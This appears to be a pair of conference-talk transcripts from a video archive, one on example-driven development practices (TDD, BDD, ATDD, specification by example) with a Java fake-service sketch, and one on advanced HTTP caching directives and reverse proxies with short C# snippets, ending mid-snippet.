Obviously, if you haven't read Michael's book, I suggest that you have a look at it. The main takeaway that I'd give on that particular regard is that please don't ask your managers to schedule in six months of refactoring, because that's going to cause everybody pain. No one's going to enjoy it. The way to go about trying to make your system testable is to identify the parts of the system that change the most and work there, introducing seams in a safer way as possible so that when you come to make changes there the next time, you are able to write tests around it. These are, this sort of messy blackboard of interacting in tightly coupled code is a side effect of poor development practices. So we need to upskill so that the new bits of code that we write that maybe sit out to the side of our existing legacy system are at least well factored and that we can drive them from examples, we can test them independently. 
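Here is a rough Java sketch of the kind of seam and faked business layer being described. Nothing in it comes from the talk's slides; the interface, class names and canned value are all invented. The point is only that once the UI (or any other consumer) depends on an interface rather than on the concrete back end, a fake can be slotted in to exercise it in isolation, including awkward cases such as timeouts that are hard to provoke against the real thing.

// The seam: consumers depend on this interface, not on the concrete business layer.
interface QuoteService {
    String latestQuoteFor(String productCode) throws ServiceTimeoutException;
}

class ServiceTimeoutException extends Exception {
}

// A fake business layer for exercising the UI layer on its own. It serves
// canned data and can simulate failures on demand.
class FakeQuoteService implements QuoteService {
    private boolean timeOutNextCall = false;

    void simulateTimeoutOnNextCall() {
        this.timeOutNextCall = true;
    }

    @Override
    public String latestQuoteFor(String productCode) throws ServiceTimeoutException {
        if (timeOutNextCall) {
            timeOutNextCall = false;
            throw new ServiceTimeoutException();   // the case that's hard to force against a real back end
        }
        return "42.00";                            // canned value, enough to drive the UI behaviour
    }
}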
The legacy part we have to go very softly with and make small modifications, introducing seams and doing very rigorous testing to make sure that we haven't broken something along the way. There are some mechanisms for doing that. So what's the difference between all of these techniques that I was talking about, BDD, ATDD, specification by example and so on. So this is a spot the difference slide. Can you tell the difference between what's on the left and what's on the right? So I don't think there is a difference. So I have Liz in the audience so she can, this was one of her blog posts which is very influential and a very good blog post. And essentially there is no real difference between any of these techniques. They all address the same problem and the problem is getting people to agree what should be done and communicating about it. Now I think there are a few things that are subtly different which come from who is collaborating at working out what those examples are. When we have the developer, the tester, the business owner and other experts sitting around the table using examples to drive out a system, collaborating using the ubiquitous language, we are working on discovering the domain. We are decomposing the problem into sets of examples. We are using the examples to illustrate what the business rules are, to illustrate what our acceptance criteria might be. And I would suggest that in general when developers are practicing TDD, it's not as collaborative as this. Now that's not to say that you can't work collaboratively using JUnit or NUnit. You absolutely can. And referring back to the Goose book at the beginning, if you look at the examples that they write there, you could actually sit down with the business owner with many of those and discuss whether that example was what the business owner was wanting. But in general, we have these two layers. We've got a collaborative layer where we have all of the stakeholders in the development team working together trying to illustrate the system using examples. And then down in the solution domain, we have the technical experts working in a slightly different way to discover the solution design, to try and drive out the actual implementation. So if I was to draw a line, I would say that TDD is typically not as collaborative as the ATDD, BDD, and specification by example practices. In fact, I would say almost always, TDD is done by developers for developers. When we're talking about collaboration, since it's a new book and I think it's an important book that a lot of people working in this space will benefit from reading, I would like to point you to this graphic novel called Commitment by Chris Matts and Olaf Marsen. And this covers a topic called feature injection, which is slightly off to the side of what we're talking about today. But it certainly talks about how the collaboration process should start early on and we should get people talking to each other in a way that drives out our solution. Another thing I think separates some of the techniques, the TDD level techniques from the more collaborative techniques that we've been talking about, is about how essential automation is to making it successful. So when we're just collaborating, when we have our business, our test and our developers collaborating around examples, this is beneficial, hugely beneficial, even if we don't get as far as automating those examples. 
So a figure that I typically use is you get 70% of the benefit from just sitting around working on those examples together early in the process. You do get benefits from going that extra step and automating your examples. So the living documentation, you get a regression test suite. These are not to be sneezed at. But as I was trying to say earlier, if you come to the example-based development techniques thinking that you're going there because you want to automate testing, you're going to miss out on many, many of the benefits. And so essentially I think that the costs and benefits of automating your examples vary depending on where you are in that test automation pyramid that I was showing you. So if you're low down working on unit tests, automation is essential. One of the main reasons we've got that unit test framework there is so that our developers can refactor quickly and easily. So they get immediate feedback about errors that they may have introduced. As you move up the pyramid, those examples become harder to automate. Their run times increase. And you get to a point where the benefit may... there is a trade-off. So if there was a division here, again I say the division would probably be between the developers on their own working on technical implementations, working on unit test code where automation is essential, and the collaborative techniques where a lot of the benefit is derived from just actually talking to each other. At this point, are there any questions? I didn't think so. So you might have noticed as I went through this talk, I use the word test sometimes, example other times and specification other times. I've actually given a similar talk that Liz was in the audience with before, and she said, never use the word test. Which is not never, okay, but try not to use the word test. And it's incredibly hard because we do often think about things being tests. Dan, who's also in the audience, is he? No. Dan North, who was the developer of JBehave, who coined the term behavior-driven development, started off doing that because he said the word test that people had to put into their tests made them think in the wrong way about what they were writing. It put them in the wrong mindset. And so he developed this tool that allowed you to write the word should, a seemingly innocuous change, one word in the English language, but he said that it had very profound implications. So I wonder if we could, can we settle on a word that isn't test? I think I've demonstrated throughout this talk that I find it very difficult not to move away from the word test. Here are a couple, these are three possibilities that are out there in the public at the moment. Example, it clearly is sitting in there with these example-based techniques. Specification by example has become popular. But recently I came across a slide deck by Elizabeth Hendrickson, where she thinks about testing something as being a combination of checking that it works and exploring that it behaves in the way that you want. And there Elizabeth is using Brian Marrick's testing quadrant to separate between the team-facing activities of unit testing and acceptance testing and the product critiquing activities of checking that things behave in the way that you expect. The exploratory testing doesn't show up any major issues and you get the performance that you require. So this led me thinking that maybe I should add check to the list of possible names. 
And I wonder if we could start using the word check, maybe that would improve the way we think about things. However, it's far too late for that. We have definitely got to a point now where test specification example are all in the public domain and we're going to have to cope with them. So in a domain where we stress the ubiquitous language, we actually have a bundle of terms that lead us into ambiguity. And I don't think there's anything we can do about it. So at this point, I just want to just skip out a second. Just to describe some of the desirable properties that I think all of our examples should demonstrate. I don't think anyone reading that, these five items would argue that these are not desirable things in an example. We want to be able to understand them, maintain them, we need them to be necessary, we want them to be at the right level of granularity, and we want them to be reliable. But I'm going to take just a couple of minutes to delve into those a little bit deeper so that we actually get a feeling for what that means. So for something to be understandable, it means that someone needs to be able to come to this example and immediately be able to get the benefit of reading that example. And this happens on several different levels. So there's the level of documentation that I talked about earlier, but equally, when that example fails, when your system no longer behaves in the way that you expect, or when someone has introduced a regression, that example should communicate that problem, should communicate that error in an immediately understandable way. So, understandability isn't just about being able to read the example, it's about when you automate it, the failing of that automated example immediately communicates to the person reading that failure report what went wrong. We're looking for our examples to be the single source of truth within the system of the requirements and the implementation. We need to make sure that our suites of examples of automated examples of automated tests are maintainable. A huge problem that I see from time and time again is people start off developing these suites of automated examples and they have a really great time doing it. And then something changes, a requirement changes, and they then find that these examples are a huge drag. They find it difficult to refactor them. They find it difficult to go and change them all. So I was working on a system where we had a wonderful suite of automated, these were tests rather than examples, and there was a breaking change made when we went from one version to the next version. But we needed to get it out for a particular ship date, and so all of those automated tests broke and they were never fixed. I went back to that client, 12 years later, those tests still had never been run again. So you get a really big drag from a set of examples that are not maintainable. It's not huge rocket science keeping your examples maintainable. It's the same sort of techniques that developers use every day, the pragmatic ideas such as do not repeat yourself. Trying to make sure that you don't have duplication, you don't keep doing things in different ways, you extract things out into abstractions, keeping your classes and your concepts independent. So this is a slide that speaks to my experience with the Roman numeral testing. How exhaustive do we need to be? Jerry Weinberg recently wrote a book called Perfect Software, and he's very big on the fact that actually there's no such thing as perfect software. 
What we have to do is understand the risk that we're prepared to take and do as much as we can to bring it within our own appetite for risk and the business risk. Granularity is possibly of all five properties. Granularity is the hardest one to communicate, the hardest one to talk about. We like being efficient, so I've just talked about not repeating ourselves. But when it comes to granularity, I'm also trying to say that each example, each test should only exercise a single behavior. So the sort of style of workflow or imperative test that does a bundle of things and then makes an assertion, then does a bundle of other things and makes another assertion, is a bad level of granularity in general. So that's a strong statement. The reason I don't like it is because what you're doing is you're making the subsequent assertions dependent on the earlier assertions. So that means that if you introduce a problem and it fails on an early assertion, well then you may fix that problem and discover there are other problems that will be uncovered by assertions that come later in the example. So wherever possible, I like to have a single behavior per example. And I guess finally, reliability, it's just so key to all of the practices of doing automation that I think we need to dwell upon it. Because again, many clients that I go to, you look at their continuous integration server and you'll see a failed build. And I ask, so what's wrong with this build? And they'll go, no, there's nothing wrong with it. It's just there's one test in there that fails every Thursday. Or, no, that test, when I run it on the desktop, it's fine. So we just ignore it. These are bad things. What we want is we want our continuous integration server to give us an immediate signal that something's wrong. If we get a failure, it means that something's gone bad and we need to fix it. If we get into the way of thinking that, oh, we can ignore this failure, then we aren't doing continuous integration. And we don't get the benefit from keeping our code clean and knowing that we can release at any time. So take a ways that I'd like to leave you with from this session are that all of these methods, all of these mechanisms are very similar. In fact, they're identical, apart from the fact that specifically technical ones are focused on driving out a solution and don't have the collaboration of your business stakeholders as well. And so at that point, there are some practices that become less valuable. Or, in fact, and there are other practices that become more valuable. So the automation is hugely essential when you're working at the technical level. As if there was one message to take away for your next set of automated examples, it's try and avoid testing through the UI. If you end up with too many UI tests, your test run will take forever, it will be brittle, and you will find that you shy away from adding new tests. You will take a risk-based approach to which of those examples you execute on a daily basis. And finally, the naming genie is out of the bottle. We're not going to get away from the fact that we call them examples, we call them tests, we call them specifications. They're all there, they're all out there in the public domain, and there's nothing we can do about it. So thank you very much for coming along. If there's any questions, I'd be happy to take them. Please remember to put a coloured card in the box as you go out.
|
There are a wealth of methods that use specifications, examples and tests to drive out the design and implementation of software systems: TDD, ATDD, BDD, SbE and more. Beyond a common feeling that the use of the T-word (test) is unfortunate (because it serves to distort the intent and distract the focus of the practitioner) there is little agreement. A further impediment, from a development perspective, has been the partitioning of the techniques into business-facing (ATDD, BDD, SbE) and technical (TDD). All methods that make use of executable examples require the participation of developers and share a common subset of pitfalls and gotchas. This session will demonstrate the commonalities between the methods and show how they can work together productively to grow software. We will examine effective techniques that should be used irrespective of the layer at which you are working, while highlighting concerns that are specific to the business and technical layers. Tooling will only be discussed to the extent that it empowers a particular technique.In conclusion, we will make a case for a more inclusive nomenclature that emphasises the shared underpinnings of all example-based techniques.
|
10.5446/51512 (DOI)
|
Hello everyone, thanks for coming. There's quite a few of you. Just in case you made a mistake, I am not Jon Skeet, that's in another room. So if you were wanting to see that, go now, it should be a good show. We're going to talk about advanced HTTP caching. There's not very much of this that is advanced beyond the fact that no one uses any of the stuff I show you. When I say no one, that's a presenter's no one, which means nearly no one uses those features of HTTP. So we're going to go through a few of the things that you can do when you use HTTP caching properly, which helps scale things and use cool technology and reduce the load on your servers and plenty of other good things. So before we start, because this is an advanced talk, have any of you come to my introduction to HTTP caching? No. Okay. So I fully hope that most of you already understand how to make a resource or a document on the web server cacheable. But just in case, I'm going to repeat some fundamentals that you can see on the screen; it's called the freshness model. And it's something that is confusing for most developers, including web developers. So I want to make sure everybody understands it very well. You can see a lovely unicorn, which we can differentiate from a pony because it has a horn at the top. And at the top is our first request, the first time your browser or your user agent or your service or your JavaScript code tries to get this Rainbow Dash unicorn. It is fresh as a baby. Hence the picture. We call that an up to date resource. It is fresh. It's new. It's not been cached by anyone just yet. No one has seen it yet. Everybody goes, oh, let's see it. Everybody goes, aww. Good. Very good. Very good. So the first time we get that request, of course, we've got a bunch of caches and proxies and browser caches that may see our lovely picture. Hello, Ian. How are you? And they may decide to cache this information for later usage. How long can they cache it for? For however long we say, from the server, the resource is valid. In this example, on our first request, you can see the cache instruction. Any of you haven't seen an HTTP request on the wire before? You can raise your hand. It is fine. So the GET means that I want to retrieve the resource. Unicorns slash rainbow dash is the URI. It is the name of that resource, the address where you can find it, probably. And the response is a 200, which means everything went fine. Here's a lovely picture of a baby unicorn at which you should go, aww. Was lunch good? Are you feeling it a bit? Okay. We can get more energy in there. I've been sick for the last two days and I'm full of energy. I'm going to try and give you as much as I can. And the cache control header, this is what you see under the 200, is giving you an instruction of maximum age. The maximum age is in seconds: 3,600 seconds, which is equal to, don't get your calculators out, an hour. No? I see some shocked views in the room. Too difficult a question. Okay. Let's get it down. So that means that any cache that sees that lovely picture of a baby unicorn that should make us go aww can cache it for an hour. We can serve it for an hour. And for an hour, we're going to consider that this cache entry is fresh. It is fresh. It can continue being served by the cache. So any further request, that's the one you will see in the lower left corner of this slide. Gosh, I had a little laser pointer, but I don't.
I'm sure you can do it with PowerPoint, but I've not used that for two years, so I don't remember. Because I switched to Mac. You have one? I love you. That's brilliant. Fantastic. So this request there. That's the second request. A cache somewhere is now able to return a cached entry. Why? Because the picture is still fresh. It is still allowed to be returned. After those 3,600 seconds, and you'll see there's a mistake there. That should say an hour. The entry is considered stale. At that point, if I serve a stale resource from a proxy for whatever reason, I'm going to say that the entry is very old. My baby is not a baby anymore. As such, I do not go... I'm ready. I have to find something else. And I put a little warning here, saying that it's stale. Okay. That's the freshness module. That's how it works with HTTP for all your requests. So when you specify your request must have a must revalidate. That means the server will try and update the resource when it's at that point. Everybody's clear with that? Any questions at this stage? If you're lost on this bit, we're going to have trouble with the rest. No questions? Okay. So we serve stuff from the cache here. And that's good. But sometimes we want to have more control from the client. Did you know that you could control the cache? And the cache freshness from your client, from your JavaScript code, maybe, from your browser, or from your.NET application for.NET developers. How many of you are.NET developers here? Wonderful. How many of you are using the new HTTP client APIs, et cetera? Okay. So it's still the awesome APIs for caching. So you're still a bit stuck with not a very nice API. But you can do all this stuff. You can do all this stuff. And we're going to try and start looking at, oh, did I not put a timer? Normally I put a timer to make sure I don't overrun. By too much. Otherwise, some people start screaming at me and running after me with baseball bats. And it's not very pretty. Not doing that joke again. Standing in the way of control. The control that the client has is completely under control. No one uses it. And it's a shame because we can do a couple of things. So the first thing is to specify in our cache control header, you saw it as a response header earlier. It can be used as a request header. So it can be a header that you add in your code before you go to the server. The first one is max age, the maximum age that the resource has. If I go back to my original freshness, you will see this age header. Any cache that provides you a cache to entry. And that includes, by the way, the local cache on Internet Explorer. If you've got an Internet Explorer version that understands HTTP caching well. So 10. And that's it. More or less. You can see the age here. It's in seconds as well. That means the age of the cache copy is 30 seconds. So we can provide a maximum age. Because the question is how old is too old for our resource? And sometimes too old is too old. If anyone does not recognize the Harry Potter, and that's a play called a cruise. Anyway, I found a picture. I wanted to put it somewhere because I thought it was cute. And we can see it's a unicorn because again, there's a horn there. At least one. So thank you. Thank you. So we can control the maximum age. Why would you want to do that? Well, because sometimes you want to retrieve data and you want to make sure that, well, on average, you may be happy to get the list of latest blog comments of the last minute because you just arrived on a blog entry. 
Sometimes you really, really want the latest copy because, for example, you just clicked on post for your latest entry. So you want to actually just give me something that is fresh. Max age equals zero. Do not give me a cached copy. So that's one we can use. Another one we can use is max stale. Now, in our freshness model that we saw earlier, we have fresh resources and we have stale resources. By default, the client should not get stale resources. If you say something is valid for 60 seconds, it's going to be served for 60 seconds and after that, it shouldn't be served anymore. But you can say, actually, you know what, I understand that crap happens and I'm okay with having a bit of an older version. So give me as fresh as you can. But if it's stale by 60 seconds, that's okay. I can deal with it. Above 60 seconds, you really need to go and get me a new copy. So we can define how stale we want our content, which that American private joke is not going to be funny for everyone. But again, I found a picture. I thought it was cool. And finally, we have another instruction that we can use on our client. It's a minimum freshness. I want a copy that will still be valid in 60 seconds. See the mind bending there. I want to make sure that the data I retrieve from the cache will still be valid in 60 seconds when I get it. Why would you want to do that? For example, if you have processing that takes on average 60 seconds behind the scenes and you want to make sure that you really get something that will be valid for 60 seconds. If the age is an hour and the time to live is an hour and 10 seconds and you provide a minimum freshness of 10 seconds, for the first hour you will get that copy. For the last 10 seconds, it will force a refresh. So this is now letting you control how long the data is going to be valid for when you request it, and forcing any proxy, any cache, to go and revalidate the data and get a fresher copy if you request it. This is supported by plenty of caches. And that lets us control the data we retrieve on the client. So if you're not using caching on the client, start using it now. It's cool. And that picture is really just because I thought it was funny. I mean, it's difficult. With cats, you have a lot of possibilities. The unicorns, not as many. So, you know, it's a struggle. It's a struggle. So of course we have different levels of caches. I just want to go back a little bit on the kind of caches we have. Just as a re-intro for those of you that have not attended my first talk or not looked at it online. The first kind of cache we can do, which is the cache instruction you get there when someone returns you a response, is a private cache. What does a private cache mean? Well, just like a private life is the stuff that you have just for yourself and you don't share with everyone else. So a private cache will be a cache that only caches things for me. Any suggestion as to which cache that may be? Anyone? No? Okay. The browser is a private cache. Your Facebook messages are not stored in the same cache as your coworker next to you, which solves a lot of problems in terms of privacy and other things like cats. I'm really falling flat on that one, aren't I? Well, you know, I'll keep on trying. So the browser can cache. If you tell the system cache control private, you're telling it, you're allowed to cache if the cache is not shared by other people. If the data is not going to be returned to other people.
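To make those request-side directives concrete, here is a rough Java sketch using the JDK's built-in HttpClient. The URL is made up, and note that this client does not itself maintain a cache; the Cache-Control request header is an instruction to whatever caches sit between you and the origin server (the browser cache in a JavaScript setting, the corporate proxy, a reverse proxy).

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class ClientCacheDirectives {
    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();

        // "I just posted something; do not serve me anything from a cache."
        HttpRequest forceFresh = HttpRequest.newBuilder()
                .uri(URI.create("https://example.org/unicorns/rainbow-dash"))
                .header("Cache-Control", "max-age=0")
                .build();

        // "Give me a copy that will still be fresh in 60 seconds."
        // (Alternatively, "max-stale=60" would say a copy up to 60 seconds
        //  past its lifetime is still acceptable.)
        HttpRequest minFresh = HttpRequest.newBuilder()
                .uri(URI.create("https://example.org/unicorns/rainbow-dash"))
                .header("Cache-Control", "min-fresh=60")
                .build();

        HttpResponse<String> response =
                client.send(forceFresh, HttpResponse.BodyHandlers.ofString());
        // The Age header, if present, tells you how old the served copy is.
        System.out.println(response.headers().firstValue("Age").orElse("no Age header"));
        client.send(minFresh, HttpResponse.BodyHandlers.ofString());
    }
}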
So anything that is personal to you usually gets private cache. And then we'll get the public cache. Public cache means that shared caches can also cache the data. We've got a couple of shared caches that exist. I'll go through them in a minute. One thing I want to bring your attention to, especially if you're a framework developer or if you are working with your own caching solution. By definition, public includes private. It sounds very simple, but it's something that needs a little bit of a mind shift. If I can allow a shared cache to cache my data, there is no reason why I should not allow a private cache to cache it. Because after all, if a big cache can get it, the small cache that caches less things is included in this. What this also means is that in HTTP there is, I was going to say there is no way. There is nearly no way to tell the system you're allowed to cache it on the proxy but not on the client. There is not a separate caching instruction. And that's because if you cache in public, then you can cache in private as well. One includes the other. And that's great for proxies. But think about something like ASP.net caching. Is ASP.net caching any different from a shared proxy or from your business proxy? It sees a request coming in. It reads the content. It stores it somewhere. The next time you go to get the request, it's going to serve it from memory from where it found it. I'm hinting here that if you are using ASP.net caching instead of a reverse proxy, which you're designing an API that does caching that doesn't behave as a proxy, then you may be understanding HTTP caching a bit wrong. Just a suggestion I have there. So what kind of shared caches do we have? Yeah. We've got a lovely graph. So this is my friend Ralph when he goes to work in the morning. I have a lot of unicorn friends. So I am not unicorn phobic. Really falling flat today. So I have a browser. The browser has a cache. We already know about that. The browser usually talks to your proxy. How many of you work in businesses that have some sort of proxy installed? Okay. How many of you have seen web sense errors before? Well, the content to this website is blocked. One at work. Raising of more hands? Okay. So you have the distributed cache already in your company. This is the most underused piece of infrastructure that we have in IT because it's not as cool as saying that you have a distributed hash table cache or velocity cache. But it is exactly the same principle. It's a big set of servers that see stuff arrive in, cache it for you, then give it back from their cache based on the instructions you provided in your response. How many of you have your own custom caching infrastructure in your company, in your software? Your own cache of any type? How many of you are using the proxies in your company to cache stuff on your HTTP interface inside the firewall? All right. So your company is paying twice for a distributed cache technology. One for the one you custom built for your solution and one at the HTTP level with a proxy. Which one do you think is costing the most? These babies cost a huge amount of money, lots of money because they are already serving thousands and thousands of customers. How many of you have a custom distributed cache system that serves thousands and thousands of concurrent connections? One. All right. That's less than the numbers having their own cache technology, right? But we won't talk about that today very much. But use it. It's cool. Okay. It's badly configured in 90% of the time. 
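Back to the private/public distinction: a hedged sketch of emitting those response directives from an ASP.NET Web API action -- the controller, routing and payloads are invented for illustration.

using System;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Web.Http;

public class CachedResponsesController : ApiController
{
    // Personal data: only the user's own (private) cache may store it.
    public HttpResponseMessage GetMyMessages()
    {
        var response = Request.CreateResponse(HttpStatusCode.OK, new[] { "hi there" });
        response.Headers.CacheControl = new CacheControlHeaderValue
        {
            Private = true,
            MaxAge = TimeSpan.FromMinutes(5)
        };
        return response;
    }

    // Shared data: proxies and reverse proxies may store it too,
    // and since public includes private, the browser can keep it as well.
    public HttpResponseMessage GetUnicorns()
    {
        var response = Request.CreateResponse(HttpStatusCode.OK, new[] { "Ralph" });
        response.Headers.CacheControl = new CacheControlHeaderValue
        {
            Public = true,
            MaxAge = TimeSpan.FromHours(1)
        };
        return response;
    }
}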
You have no idea who manages those servers. There are massive amount of rules that follow all the merges that your big company has that basically puts every single website in an exclusion list, which means that it doesn't actually cache anything most of the time. But if you configure it properly, it's a very powerful way of distributing load in your company. So think about that. The second kind of cache is there, the reverse proxy. So this is a trajectory of your default connection. We have a request for a picture of a cat. Although I suspect that Unicorps may be looking at a picture of dogs instead. It goes through the proxy. The proxy goes to the internet. And the end points, Microsoft people like this word, the end point is your reverse proxy. This is the URL that you're going to get to when you type in your browser. And then this is going to forward the request over to your actual server. This is a squid. For those of you that are not very up to date on goodbye, on what is it, seafood. And the reason it's there is because one of the most well-known reverse proxies is called squid. Not just because I like the picture for once. So squid is a very well-known reverse proxy that supports all the features I'm going to show you afterwards. And then finally we get to our server here when the data is not, when the data is not still. So why do we have reverse proxies? Why would we use reverse proxies? What's the point of having a reverse proxy that's squid in your system? Well, there's quite a few points really. First, these babies tend to change a lot. How many of you use systems like Cisco load balancing to dynamically balance between systems and the network level? How is it to configure? Do you have a form to fill in every time there's a change? No. You're lucky. You're very lucky. Anyone works in a bank? Okay. So you would have that. You may have a couple of forms to fill in. No. No. You got a good bank as well. All right. So it's just in London that they're all crazy. That's possible. So normally to be able to change that, you need to find the guys that are managing the Cisco router. They're usually the same guys that are managing the proxies. They're usually in another building, although I suspect it's usually a bunker because I always have a lot of trouble finding them to talk to them. And then you need to fill in the new server that you added and the conditions under which the load is going to be distributed. And all of this is done at the network level. It's not done at the HTTP level. First advantage we have on reverse proxies is that we can dispatch to various servers without anyone noticing. So it lets you change your internal systems much more easily. And another one, of course, is that we don't go back to the server all the time. If your application takes 400 milliseconds to generate the latest entry of blog post, why go there all the time on that full server to get it when you can have a cache here that will happily cache the data and just serve the latest that was still valid four seconds ago. So this lets you scale easily. And the other advantage, of course, is cost. These babies tend to cost money. Those ones usually cost nothing because they don't really need to be very good. So they let you scale on the load much more easily and directly. When we start using, actually, that slide is in the wrong place. Okay, that doesn't matter. When we have shared proxies, as I said before, we may, yes, sorry, that slide was a little bit before. It just got moved by accident. 
So I'll just cover it anyway. In your head, just imagine we were two slides before. The S Max age is for the shared proxies. So we can define that the resource is going to be valid for 10 seconds on your big proxies and shared proxies and an hour on the local computer. That means Internet Explorer can cache for an hour and ISA server web sense can cache for 10 seconds. That came at the discussion where I was telling you that you couldn't tell the browser to cache differently from the shared caches. So we'll ignore that this is there. And this is apparently plenty of unicorns. But you will have to have a zoom on that. So reverse proxies, yes, they're good, really good. You should use them. We're going back to the reverse proxy. Apologies for that. One other thing as well that we use reverse proxies for is to put at the boundary in your DMZ. Stuff that takes a lot of processing time. Things like SSL or TLS. Because those babies, if you want to scale, have special hardware that help, for example, with TLS encryption. All active network cards, things that you don't necessarily have in your app servers. And the world is moving more and more towards TLS. And as you know, if you're using HTTPS, you don't cache anything in your proxies. Your proxies don't see anything. They just tunnel the requests. They can't share anything because the encryption is point to point. So when we use a reverse proxy in an SSL environment, we keep the security going from the client all the way to the reverse proxy. That's on our DMZ. And the reverse proxy is then chatting on unencrypted channels with our servers. But at that point, we should be inside our network. So there should be no problem with that. So we can remove a lot of the configuration problems, for example, in our applications, getting SSL certificates sorted, getting good scalability encryption mechanisms on the right level by pushing everything on the reverse proxies and letting your app server deal only with building apps. Which is also great if you don't want to go and reconfigure those boxes every time you add or remove one. Any questions so far on the encryption at the boundary? Okay. So once we have in place systems like that, the question becomes at which point of scalability do you start hitting issues? As I said, reverse proxy is going to serve the data as long as it's fresh. What happens when the data is not fresh anymore? Typically, a reverse proxy is going to try and revalidate the data. When I say revalidate, I'm going to take my client, I'm going to say, hey, give me the list of all the latest unicorns. And this one is going to realize, damn, damn, I don't have a fresh version. What do I do? At that point, it is going to re-query your very slow app server to get the latest version. Now, that sounds simple enough in practice. It works. What do you do? There's 10,000 people requesting that list while it revalidates. What do you do? You just wait for 10,000 connections until you get the new version, which is causing a few issues in terms of scalability because data that was on your front page and showed up in 20 milliseconds now take a lot, lot, longer. And people will notice that. That's what we have here. In the first request, we pull the data, it goes into the cache, we return it to the client. The first request is slow. Stuff happens, yes. But that's your hydration of your service, the first time that the data fills the cache. 
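Going back to the s-maxage instruction he covered a moment ago: CacheControlHeaderValue exposes it as SharedMaxAge, so splitting the lifetime between private and shared caches might look like this sketch (the values are invented).

using System;
using System.Net.Http;
using System.Net.Http.Headers;

static class SharedCacheLifetime
{
    // Browsers may keep this for an hour; shared caches (ISA/Squid/your reverse proxy)
    // only for ten seconds. On the wire: Cache-Control: public, max-age=3600, s-maxage=10
    static void Apply(HttpResponseMessage response)
    {
        response.Headers.CacheControl = new CacheControlHeaderValue
        {
            Public = true,
            MaxAge = TimeSpan.FromHours(1),
            SharedMaxAge = TimeSpan.FromSeconds(10)
        };
    }
}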
Second time, as long as the data is fresh, we go to the reverse proxy, we get the data there, we return it immediately. That should be damn fast. That's wrong, actually. It is wrong. That's better. Okay. That should be very fast. Your reverse proxies are just serving some bytes from the drive, so it should be really, really quick if it's properly configured. When the data becomes stale, when we've reached the max age, we go to the reverse proxy and then someone else goes to the reverse proxy and everybody waits in a queue until we can revalidate. We go back to the server, say, hey, do you have anything new for me or can I still use my cache entry? We'll get the data back and then everybody gets the response at the end. We just end up with a massive amount of waiting time there. Now, how do we solve that problem? I hear you ask fervently. So there's two ways to solve it. I'm trying to stay on the HTTP side of things on this talk. Know that if you use any kind of advanced reverse proxy, you will have mechanisms that automatically refresh the data for you as the data starts approaching staleness. So 60 seconds before it gets out of date, you can configure your system to go and pull the data again to make sure it's up to date. You can do that, but you need to do it manually. It's boring. It requires network admin intervention and maybe live access systems which you may not have access to if you are in a regulated environment. So instead, we have a new extension of HTTP caching that is being proposed by a guy called Mark Nottingham, which is one of the guys who's both helping writing the HTTP specification. So he knows a thing or two about that. And he also helped write SOAP, but we won't talk about that. He apologized for SOAP, so it's fine. He did the talk. He's on live. I'm not joking. We have a new instruction called stale while we validate. I told you before, by default, a client can say, I want the data fresh, and I want it fresh now. Do not give me stale stuff. All the clients can say, well, give me stale for a while. But the server can tell the reverse proxy or any proxy in the middle in the case where things go stale, you need to go and get a new version for, you know, two, three seconds, continue serving the old version instead of just blocking everyone. That increases scalability quite a bit, because as you can see, the data is already stale. We're going to get a stale version for a little while. As synchronously, the reverse proxy is going to go and get a new version without blocking anyone. So a request coming in still have the data. No one gets blocked. You don't end up with a massive queue and your server doesn't get overloaded. Yay. Next request that comes in after the refresh will get the latest copy. Another extension, of course, is when errors happen. How often do you get exceptions on your web front end? ASP.NET. Who sees exceptions on their live ASP.NET sites? Raise your hands. All right. Crap happens. 99% of errors are transitional in nature. Just at the point you requested it, we had a little bit of a problem with someone stumbling upon a network cable. That lasted for one second until you re-plugged it in. You go one second later. The same request, same functionality you're trying to execute functions properly. So what do we do usually? We retry a couple of times to make sure that any error that is only temporary gets ignored. Now, in the case of a reverse proxy that's validating, that doesn't work. We try and go and re-validate and we end up with a big error. 
Now, if you are the homepage of Yahoo or Microsoft, what is better? To show the error to the user or to show the latest news but 10 seconds late. In general, we tend not to show errors to users because they kind of don't look very good. Old content is better than bad content. So the stale if error is exactly the same mechanism as we had with the stale while re-validates, it lets you specify that for a bunch of seconds after an error, say five seconds here, if there's an error with the original server, we'll just serve the stale copy. We won't serve stale under any other condition but if the app server crashes for whatever reason, for five seconds, keep on serving the old one. Then hopefully in the five seconds, someone will have reconnected the plug or the guy will stop rolling with his chair on top of the network cable or whatever it is. Some data centers are more lax than others. You never know. So those are two extensions to HTTP caching that are currently being standardized. They're new but they're already implemented in squid. So you can go and have fun with that if you have high traffic websites. Now, of course, we now have cache entries and we know that when they get stale, something is going to go back to our server and gets the latest version. But sometimes we really want to be able to tell the cache to invalidate stuff. Just to tell you by the way, that resource, please just flush the entry you have for it because I'm modifying it. So of course, as the saying goes, there's two difficult problems in computing. There's naming things. There's cache invalidation and off by one error. So that jokes usually gets more laughs than that. Just count. I know you were not very good with counting earlier. But that one is too three. So we can do cache invalidation with HTTP today. So people that tell you there's no cache invalidation in HTTP, it sucks user in such product name here. Oh, wrong. They're wrong. They're absolutely wrong. We can invalidate things. We can invalidate things using HTTP methods. So for those of you that haven't seen HTTP requests before, I showed you a couple of HTTP requests. They all started with get. Get is called a method. It's also a verb, but it's called a method. The spec calls it a method. And the spec is 10, 15 years old. So if you still call it a verb, welcome to HTTP 1.1. We call it a method or 1.0 actually. And some methods are safe. They're not supposed to change anything like get or head. If you receive head, it's usually safe. I've been told. See, that one works better. I need to stop trying to make jokes that don't involve sex because they don't work. Okay. So those ones don't change anything. However, plenty of methods like post, put, delete, and any unknown method by the server tends to say that the data is invalidated. It makes a lot of sense if you think about it. One of the reasons we have HTTP and one of the constraints of RESTful architectures, which is self-descriptive, this rewind, self-descriptive messages is that we can reason just looking at the message without understanding the content. Now, if you tell me that you're deleting a comment from a blog, it's quite logical to think that my squid server can invalidate the cache and remove it because it's probably not valid anymore if I try to delete it. Now, do you understand that invalidation in HTTP is not like an Ibanez? Who's using an Ibanez cache here? No one? Okay. So some caches get updated by the result of a delete, for example. So the cache now knows that the resource is deleted. 
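The stale-while-revalidate and stale-if-error directives from a moment ago are extensions, so there are no dedicated properties for them in .NET; as far as I can tell you have to add them through the Extensions collection -- a sketch, with made-up numbers.

using System;
using System.Net.Http;
using System.Net.Http.Headers;

static class StaleDirectives
{
    // On the wire: Cache-Control: public, max-age=600, stale-while-revalidate=30, stale-if-error=5
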